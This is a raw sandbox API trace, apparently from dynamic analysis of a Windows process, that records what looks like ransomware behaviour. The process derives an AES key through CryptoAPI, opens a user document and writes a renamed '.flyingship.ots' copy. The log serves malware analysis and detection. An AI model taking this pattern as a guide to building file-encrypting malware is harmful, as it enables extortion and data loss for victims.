PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.830] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.830] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.830] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.831] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.831] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f0f0f0, ftCreationTime.dwHighDateTime=0x1d5e547, ftLastAccessTime.dwLowDateTime=0x24d4fc30, ftLastAccessTime.dwHighDateTime=0x1d5dd39, ftLastWriteTime.dwLowDateTime=0x24d4fc30, ftLastWriteTime.dwHighDateTime=0x1d5dd39, nFileSizeHigh=0x0, nFileSizeLow=0x2691, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="G856.ots", cAlternateFileName="")) returned 0x90ae18 [0177.831] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0177.831] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.831] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0177.831] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.831] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.831] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0177.831] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.831] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0177.831] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.831] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.831] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0177.831] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.831] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.832] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.832] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.832] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.832] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0177.832] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.832] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0177.833] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.833] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.833] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0177.833] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.833] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.833] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.833] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.833] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.833] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0177.833] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.833] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.833] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.833] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.833] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.833] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.833] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0177.833] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.833] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.833] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0177.833] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.834] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.834] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0177.834] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.834] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.834] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0177.834] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.834] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.834] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.834] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.834] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.834] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.834] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.834] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.834] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0177.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.834] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0177.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.834] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.834] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.834] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.835] CryptHashData (hHash=0x90af58, pbData=0x8df028, dwDataLen=0x19, dwFlags=0x1) returned 1 [0177.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.849] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.849] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.849] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.849] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.849] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.849] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0177.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.849] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.849] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0177.849] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.849] CryptDestroyHash (hHash=0x90af58) returned 1 [0177.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.849] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.849] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.849] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.849] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.850] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\g856.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0177.851] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.851] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0177.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0177.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0177.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0177.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.851] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0177.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0177.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0177.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0177.851] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0177.851] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0177.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0177.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0177.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0177.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0177.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0177.853] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf")) returned 0x10 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0177.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0177.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0177.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.flyingship.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\g856.flyingship.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0177.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0177.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0177.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0177.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0177.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0177.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.855] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.855] 